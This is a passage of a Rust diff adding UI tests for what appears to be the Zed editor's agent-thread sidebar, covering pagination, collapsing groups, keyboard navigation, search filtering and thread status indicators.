cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project-a]", " Thread A1"] + ); + + // Add a second workspace + multi_workspace.update_in(cx, |mw, window, cx| { + mw.create_test_workspace(window, cx).detach(); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project-a]", " Thread A1",] + ); + + // Remove the second workspace + multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().nth(1).cloned().unwrap(); + mw.remove(&workspace, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project-a]", " Thread A1"] + ); +} + +#[gpui::test] +async fn test_view_more_pagination(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(12, &project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Thread 12", + " Thread 11", + " Thread 10", + " Thread 9", + " Thread 8", + " + View More", + ] + ); +} + +#[gpui::test] +async fn test_view_more_batched_expansion(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Create 17 threads: initially shows 5, then 10, then 15, then all 17 with Collapse + save_n_test_threads(17, &project, cx).await; + + let path_list = project.read_with(cx, |project, cx| { + project.project_group_key(cx).path_list().clone() + }); + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + 
cx.run_until_parked(); + + // Initially shows 5 threads + View More + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 7); // header + 5 threads + View More + assert!(entries.iter().any(|e| e.contains("View More"))); + + // Focus and navigate to View More, then confirm to expand by one batch + focus_sidebar(&sidebar, cx); + for _ in 0..7 { + cx.dispatch_action(SelectNext); + } + cx.dispatch_action(Confirm); + cx.run_until_parked(); + + // Now shows 10 threads + View More + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 12); // header + 10 threads + View More + assert!(entries.iter().any(|e| e.contains("View More"))); + + // Expand again by one batch + sidebar.update_in(cx, |s, _window, cx| { + let current = s.expanded_groups.get(&path_list).copied().unwrap_or(0); + s.expanded_groups.insert(path_list.clone(), current + 1); + s.update_entries(cx); + }); + cx.run_until_parked(); + + // Now shows 15 threads + View More + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 17); // header + 15 threads + View More + assert!(entries.iter().any(|e| e.contains("View More"))); + + // Expand one more time - should show all 17 threads with Collapse button + sidebar.update_in(cx, |s, _window, cx| { + let current = s.expanded_groups.get(&path_list).copied().unwrap_or(0); + s.expanded_groups.insert(path_list.clone(), current + 1); + s.update_entries(cx); + }); + cx.run_until_parked(); + + // All 17 threads shown with Collapse button + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 19); // header + 17 threads + Collapse + assert!(!entries.iter().any(|e| e.contains("View More"))); + assert!(entries.iter().any(|e| e.contains("Collapse"))); + + // Click collapse - should go back to showing 5 threads + sidebar.update_in(cx, |s, _window, cx| { + s.expanded_groups.remove(&path_list); + s.update_entries(cx); + }); + cx.run_until_parked(); + + // Back 
to initial state: 5 threads + View More + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 7); // header + 5 threads + View More + assert!(entries.iter().any(|e| e.contains("View More"))); +} + +#[gpui::test] +async fn test_collapse_and_expand_group(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(1, &project, cx).await; + + let path_list = project.read_with(cx, |project, cx| { + project.project_group_key(cx).path_list().clone() + }); + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Thread 1"] + ); + + // Collapse + sidebar.update_in(cx, |s, window, cx| { + s.toggle_collapse(&path_list, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["> [my-project]"] + ); + + // Expand + sidebar.update_in(cx, |s, window, cx| { + s.toggle_collapse(&path_list, window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Thread 1"] + ); +} + +#[gpui::test] +async fn test_visible_entries_as_strings(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + let expanded_path = PathList::new(&[std::path::PathBuf::from("/expanded")]); + let collapsed_path = PathList::new(&[std::path::PathBuf::from("/collapsed")]); + + sidebar.update_in(cx, |s, _window, _cx| { + 
s.collapsed_groups.insert(collapsed_path.clone()); + s.contents + .notified_threads + .insert(acp::SessionId::new(Arc::from("t-5"))); + s.contents.entries = vec![ + // Expanded project header + ListEntry::ProjectHeader { + key: project::ProjectGroupKey::new(None, expanded_path.clone()), + label: "expanded-project".into(), + highlight_positions: Vec::new(), + has_running_threads: false, + waiting_thread_count: 0, + is_active: true, + }, + ListEntry::Thread(ThreadEntry { + metadata: ThreadMetadata { + session_id: acp::SessionId::new(Arc::from("t-1")), + agent_id: AgentId::new("zed-agent"), + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + title: "Completed thread".into(), + updated_at: Utc::now(), + created_at: Some(Utc::now()), + archived: false, + }, + icon: IconName::ZedAgent, + icon_from_external_svg: None, + status: AgentThreadStatus::Completed, + workspace: ThreadEntryWorkspace::Open(workspace.clone()), + is_live: false, + is_background: false, + is_title_generating: false, + highlight_positions: Vec::new(), + worktrees: Vec::new(), + diff_stats: DiffStats::default(), + }), + // Active thread with Running status + ListEntry::Thread(ThreadEntry { + metadata: ThreadMetadata { + session_id: acp::SessionId::new(Arc::from("t-2")), + agent_id: AgentId::new("zed-agent"), + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + title: "Running thread".into(), + updated_at: Utc::now(), + created_at: Some(Utc::now()), + archived: false, + }, + icon: IconName::ZedAgent, + icon_from_external_svg: None, + status: AgentThreadStatus::Running, + workspace: ThreadEntryWorkspace::Open(workspace.clone()), + is_live: true, + is_background: false, + is_title_generating: false, + highlight_positions: Vec::new(), + worktrees: Vec::new(), + diff_stats: DiffStats::default(), + }), + // Active thread with Error status + ListEntry::Thread(ThreadEntry { + metadata: ThreadMetadata { + session_id: 
acp::SessionId::new(Arc::from("t-3")), + agent_id: AgentId::new("zed-agent"), + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + title: "Error thread".into(), + updated_at: Utc::now(), + created_at: Some(Utc::now()), + archived: false, + }, + icon: IconName::ZedAgent, + icon_from_external_svg: None, + status: AgentThreadStatus::Error, + workspace: ThreadEntryWorkspace::Open(workspace.clone()), + is_live: true, + is_background: false, + is_title_generating: false, + highlight_positions: Vec::new(), + worktrees: Vec::new(), + diff_stats: DiffStats::default(), + }), + // Thread with WaitingForConfirmation status, not active + ListEntry::Thread(ThreadEntry { + metadata: ThreadMetadata { + session_id: acp::SessionId::new(Arc::from("t-4")), + agent_id: AgentId::new("zed-agent"), + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + title: "Waiting thread".into(), + updated_at: Utc::now(), + created_at: Some(Utc::now()), + archived: false, + }, + icon: IconName::ZedAgent, + icon_from_external_svg: None, + status: AgentThreadStatus::WaitingForConfirmation, + workspace: ThreadEntryWorkspace::Open(workspace.clone()), + is_live: false, + is_background: false, + is_title_generating: false, + highlight_positions: Vec::new(), + worktrees: Vec::new(), + diff_stats: DiffStats::default(), + }), + // Background thread that completed (should show notification) + ListEntry::Thread(ThreadEntry { + metadata: ThreadMetadata { + session_id: acp::SessionId::new(Arc::from("t-5")), + agent_id: AgentId::new("zed-agent"), + folder_paths: PathList::default(), + main_worktree_paths: PathList::default(), + title: "Notified thread".into(), + updated_at: Utc::now(), + created_at: Some(Utc::now()), + archived: false, + }, + icon: IconName::ZedAgent, + icon_from_external_svg: None, + status: AgentThreadStatus::Completed, + workspace: ThreadEntryWorkspace::Open(workspace.clone()), + is_live: true, + is_background: true, + 
is_title_generating: false, + highlight_positions: Vec::new(), + worktrees: Vec::new(), + diff_stats: DiffStats::default(), + }), + // View More entry + ListEntry::ViewMore { + key: project::ProjectGroupKey::new(None, expanded_path.clone()), + is_fully_expanded: false, + }, + // Collapsed project header + ListEntry::ProjectHeader { + key: project::ProjectGroupKey::new(None, collapsed_path.clone()), + label: "collapsed-project".into(), + highlight_positions: Vec::new(), + has_running_threads: false, + waiting_thread_count: 0, + is_active: false, + }, + ]; + + // Select the Running thread (index 2) + s.selection = Some(2); + }); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [expanded-project]", + " Completed thread", + " Running thread * (running) <== selected", + " Error thread * (error)", + " Waiting thread (waiting)", + " Notified thread * (!)", + " + View More", + "> [collapsed-project]", + ] + ); + + // Move selection to the collapsed header + sidebar.update_in(cx, |s, _window, _cx| { + s.selection = Some(7); + }); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx).last().cloned(), + Some("> [collapsed-project] <== selected".to_string()), + ); + + // Clear selection + sidebar.update_in(cx, |s, _window, _cx| { + s.selection = None; + }); + + // No entry should have the selected marker + let entries = visible_entries_as_strings(&sidebar, cx); + for entry in &entries { + assert!( + !entry.contains("<== selected"), + "unexpected selection marker in: {}", + entry + ); + } +} + +#[gpui::test] +async fn test_keyboard_select_next_and_previous(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(3, &project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + 
+ // Entries: [header, thread3, thread2, thread1] + // Focusing the sidebar does not set a selection; select_next/select_previous + // handle None gracefully by starting from the first or last entry. + focus_sidebar(&sidebar, cx); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), None); + + // First SelectNext from None starts at index 0 + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); + + // Move down through remaining entries + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(1)); + + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(2)); + + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(3)); + + // At the end, wraps back to first entry + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); + + // Navigate back to the end + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(1)); + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(2)); + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(3)); + + // Move back up + cx.dispatch_action(SelectPrevious); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(2)); + + cx.dispatch_action(SelectPrevious); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(1)); + + cx.dispatch_action(SelectPrevious); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); + + // At the top, selection clears (focus returns to editor) + cx.dispatch_action(SelectPrevious); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), None); +} + +#[gpui::test] +async fn test_keyboard_select_first_and_last(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| 
MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(3, &project, cx).await; + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + focus_sidebar(&sidebar, cx); + + // SelectLast jumps to the end + cx.dispatch_action(SelectLast); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(3)); + + // SelectFirst jumps to the beginning + cx.dispatch_action(SelectFirst); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); +} + +#[gpui::test] +async fn test_keyboard_focus_in_does_not_set_selection(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // Initially no selection + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), None); + + // Open the sidebar so it's rendered, then focus it to trigger focus_in. + // focus_in no longer sets a default selection. 
+ focus_sidebar(&sidebar, cx); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), None); + + // Manually set a selection, blur, then refocus — selection should be preserved + sidebar.update_in(cx, |sidebar, _window, _cx| { + sidebar.selection = Some(0); + }); + + cx.update(|window, _cx| { + window.blur(); + }); + cx.run_until_parked(); + + sidebar.update_in(cx, |_, window, cx| { + cx.focus_self(window); + }); + cx.run_until_parked(); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); +} + +#[gpui::test] +async fn test_keyboard_confirm_on_project_header_toggles_collapse(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(1, &project, cx).await; + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Thread 1"] + ); + + // Focus the sidebar and select the header (index 0) + focus_sidebar(&sidebar, cx); + sidebar.update_in(cx, |sidebar, _window, _cx| { + sidebar.selection = Some(0); + }); + + // Confirm on project header collapses the group + cx.dispatch_action(Confirm); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["> [my-project] <== selected"] + ); + + // Confirm again expands the group + cx.dispatch_action(Confirm); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project] <== selected", " Thread 1",] + ); +} + +#[gpui::test] +async fn test_keyboard_confirm_on_view_more_expands(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = 
setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(8, &project, cx).await; + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Should show header + 5 threads + "View More" + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 7); + assert!(entries.iter().any(|e| e.contains("View More"))); + + // Focus sidebar (selection starts at None), then navigate down to the "View More" entry (index 6) + focus_sidebar(&sidebar, cx); + for _ in 0..7 { + cx.dispatch_action(SelectNext); + } + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(6)); + + // Confirm on "View More" to expand + cx.dispatch_action(Confirm); + cx.run_until_parked(); + + // All 8 threads should now be visible with a "Collapse" button + let entries = visible_entries_as_strings(&sidebar, cx); + assert_eq!(entries.len(), 10); // header + 8 threads + Collapse button + assert!(!entries.iter().any(|e| e.contains("View More"))); + assert!(entries.iter().any(|e| e.contains("Collapse"))); +} + +#[gpui::test] +async fn test_keyboard_expand_and_collapse_selected_entry(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(1, &project, cx).await; + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Thread 1"] + ); + + // Focus sidebar and manually select the header (index 0). Press left to collapse. 
+ focus_sidebar(&sidebar, cx); + sidebar.update_in(cx, |sidebar, _window, _cx| { + sidebar.selection = Some(0); + }); + + cx.dispatch_action(SelectParent); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["> [my-project] <== selected"] + ); + + // Press right to expand + cx.dispatch_action(SelectChild); + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project] <== selected", " Thread 1",] + ); + + // Press right again on already-expanded header moves selection down + cx.dispatch_action(SelectChild); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(1)); +} + +#[gpui::test] +async fn test_keyboard_collapse_from_child_selects_parent(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(1, &project, cx).await; + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Focus sidebar (selection starts at None), then navigate down to the thread (child) + focus_sidebar(&sidebar, cx); + cx.dispatch_action(SelectNext); + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(1)); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Thread 1 <== selected",] + ); + + // Pressing left on a child collapses the parent group and selects it + cx.dispatch_action(SelectParent); + cx.run_until_parked(); + + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["> [my-project] <== selected"] + ); +} + +#[gpui::test] +async fn test_keyboard_navigation_on_empty_list(cx: &mut TestAppContext) { + let project = init_test_project("/empty-project", cx).await; + let (multi_workspace, 
cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project, window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + // An empty project has the header and a new thread button. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [empty-project]", " [+ New Thread]"] + ); + + // Focus sidebar — focus_in does not set a selection + focus_sidebar(&sidebar, cx); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), None); + + // First SelectNext from None starts at index 0 (header) + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); + + // SelectNext moves to the new thread button + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(1)); + + // At the end, wraps back to first entry + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(0)); + + // SelectPrevious from first entry clears selection (returns to editor) + cx.dispatch_action(SelectPrevious); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), None); +} + +#[gpui::test] +async fn test_selection_clamps_after_entry_removal(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_n_test_threads(1, &project, cx).await; + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // Focus sidebar (selection starts at None), navigate down to the thread (index 1) + focus_sidebar(&sidebar, cx); + cx.dispatch_action(SelectNext); + cx.dispatch_action(SelectNext); + assert_eq!(sidebar.read_with(cx, |s, _| s.selection), Some(1)); + + // Collapse the group, which removes the thread from the list + cx.dispatch_action(SelectParent); + cx.run_until_parked(); + + // Selection should be clamped to the last valid 
index (0 = header) + let selection = sidebar.read_with(cx, |s, _| s.selection); + let entry_count = sidebar.read_with(cx, |s, _| s.contents.entries.len()); + assert!( + selection.unwrap_or(0) < entry_count, + "selection {} should be within bounds (entries: {})", + selection.unwrap_or(0), + entry_count, + ); +} + +async fn init_test_project_with_agent_panel( + worktree_path: &str, + cx: &mut TestAppContext, +) -> Entity { + agent_ui::test_support::init_test(cx); + cx.update(|cx| { + cx.update_flags(false, vec!["agent-v2".into()]); + ThreadStore::init_global(cx); + ThreadMetadataStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + prompt_store::init(cx); + }); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(worktree_path, serde_json::json!({ "src": {} })) + .await; + cx.update(|cx| ::set_global(fs.clone(), cx)); + project::Project::test(fs, [worktree_path.as_ref()], cx).await +} + +fn add_agent_panel( + workspace: &Entity, + cx: &mut gpui::VisualTestContext, +) -> Entity { + workspace.update_in(cx, |workspace, window, cx| { + let panel = cx.new(|cx| AgentPanel::test_new(workspace, window, cx)); + workspace.add_panel(panel.clone(), window, cx); + panel + }) +} + +fn setup_sidebar_with_agent_panel( + multi_workspace: &Entity, + cx: &mut gpui::VisualTestContext, +) -> (Entity, Entity) { + let sidebar = setup_sidebar(multi_workspace, cx); + let workspace = multi_workspace.read_with(cx, |mw, _cx| mw.workspace().clone()); + let panel = add_agent_panel(&workspace, cx); + (sidebar, panel) +} + +#[gpui::test] +async fn test_parallel_threads_shown_with_live_status(cx: &mut TestAppContext) { + let project = init_test_project_with_agent_panel("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + // Open thread A and keep it generating. 
+ let connection = StubAgentConnection::new(); + open_thread_with_connection(&panel, connection.clone(), cx); + send_message(&panel, cx); + + let session_id_a = active_session_id(&panel, cx); + save_test_thread_metadata(&session_id_a, &project, cx).await; + + cx.update(|_, cx| { + connection.send_update( + session_id_a.clone(), + acp::SessionUpdate::AgentMessageChunk(acp::ContentChunk::new("working...".into())), + cx, + ); + }); + cx.run_until_parked(); + + // Open thread B (idle, default response) — thread A goes to background. + connection.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done".into()), + )]); + open_thread_with_connection(&panel, connection, cx); + send_message(&panel, cx); + + let session_id_b = active_session_id(&panel, cx); + save_test_thread_metadata(&session_id_b, &project, cx).await; + + cx.run_until_parked(); + + let mut entries = visible_entries_as_strings(&sidebar, cx); + entries[1..].sort(); + assert_eq!( + entries, + vec!["v [my-project]", " Hello *", " Hello * (running)",] + ); +} + +#[gpui::test] +async fn test_background_thread_completion_triggers_notification(cx: &mut TestAppContext) { + let project_a = init_test_project_with_agent_panel("/project-a", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + let (sidebar, panel_a) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + // Open thread on workspace A and keep it generating. 
+ let connection_a = StubAgentConnection::new(); + open_thread_with_connection(&panel_a, connection_a.clone(), cx); + send_message(&panel_a, cx); + + let session_id_a = active_session_id(&panel_a, cx); + save_test_thread_metadata(&session_id_a, &project_a, cx).await; + + cx.update(|_, cx| { + connection_a.send_update( + session_id_a.clone(), + acp::SessionUpdate::AgentMessageChunk(acp::ContentChunk::new("chunk".into())), + cx, + ); + }); + cx.run_until_parked(); + + // Add a second workspace and activate it (making workspace A the background). + let fs = cx.update(|_, cx| ::global(cx)); + let project_b = project::Project::test(fs, [], cx).await; + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_b, window, cx); + }); + cx.run_until_parked(); + + // Thread A is still running; no notification yet. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project-a]", " Hello * (running)",] + ); + + // Complete thread A's turn (transition Running → Completed). + connection_a.end_turn(session_id_a.clone(), acp::StopReason::EndTurn); + cx.run_until_parked(); + + // The completed background thread shows a notification indicator. 
+ assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [project-a]", " Hello * (!)",] + ); +} + +fn type_in_search(sidebar: &Entity, query: &str, cx: &mut gpui::VisualTestContext) { + sidebar.update_in(cx, |sidebar, window, cx| { + window.focus(&sidebar.filter_editor.focus_handle(cx), cx); + sidebar.filter_editor.update(cx, |editor, cx| { + editor.set_text(query, window, cx); + }); + }); + cx.run_until_parked(); +} + +#[gpui::test] +async fn test_search_narrows_visible_threads_to_matches(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + for (id, title, hour) in [ + ("t-1", "Fix crash in project panel", 3), + ("t-2", "Add inline diff view", 2), + ("t-3", "Refactor settings module", 1), + ] { + save_thread_metadata( + acp::SessionId::new(Arc::from(id)), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, hour, 0, 0).unwrap(), + None, + &project, + cx, + ); + } + cx.run_until_parked(); + + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Fix crash in project panel", + " Add inline diff view", + " Refactor settings module", + ] + ); + + // User types "diff" in the search box — only the matching thread remains, + // with its workspace header preserved for context. + type_in_search(&sidebar, "diff", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Add inline diff view <== selected",] + ); + + // User changes query to something with no matches — list is empty. + type_in_search(&sidebar, "nonexistent", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + Vec::::new() + ); +} + +#[gpui::test] +async fn test_search_matches_regardless_of_case(cx: &mut TestAppContext) { + // Scenario: A user remembers a thread title but not the exact casing. 
+ // Search should match case-insensitively so they can still find it. + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-1")), + "Fix Crash In Project Panel".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + cx.run_until_parked(); + + // Lowercase query matches mixed-case title. + type_in_search(&sidebar, "fix crash", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Fix Crash In Project Panel <== selected", + ] + ); + + // Uppercase query also matches the same title. + type_in_search(&sidebar, "FIX CRASH", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Fix Crash In Project Panel <== selected", + ] + ); +} + +#[gpui::test] +async fn test_escape_clears_search_and_restores_full_list(cx: &mut TestAppContext) { + // Scenario: A user searches, finds what they need, then presses Escape + // to dismiss the filter and see the full list again. + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + for (id, title, hour) in [("t-1", "Alpha thread", 2), ("t-2", "Beta thread", 1)] { + save_thread_metadata( + acp::SessionId::new(Arc::from(id)), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, hour, 0, 0).unwrap(), + None, + &project, + cx, + ) + } + cx.run_until_parked(); + + // Confirm the full list is showing. + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Alpha thread", " Beta thread",] + ); + + // User types a search query to filter down. 
+ focus_sidebar(&sidebar, cx); + type_in_search(&sidebar, "alpha", cx); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec!["v [my-project]", " Alpha thread <== selected",] + ); + + // User presses Escape — filter clears, full list is restored. + // The selection index (1) now points at the first thread entry. + cx.dispatch_action(Cancel); + cx.run_until_parked(); + assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [my-project]", + " Alpha thread <== selected", + " Beta thread", + ] + ); +} + +#[gpui::test] +async fn test_search_only_shows_workspace_headers_with_matches(cx: &mut TestAppContext) { + let project_a = init_test_project("/project-a", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + for (id, title, hour) in [ + ("a1", "Fix bug in sidebar", 2), + ("a2", "Add tests for editor", 1), + ] { + save_thread_metadata( + acp::SessionId::new(Arc::from(id)), + title.into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, hour, 0, 0).unwrap(), + None, + &project_a, + cx, + ) + } + + // Add a second workspace. 
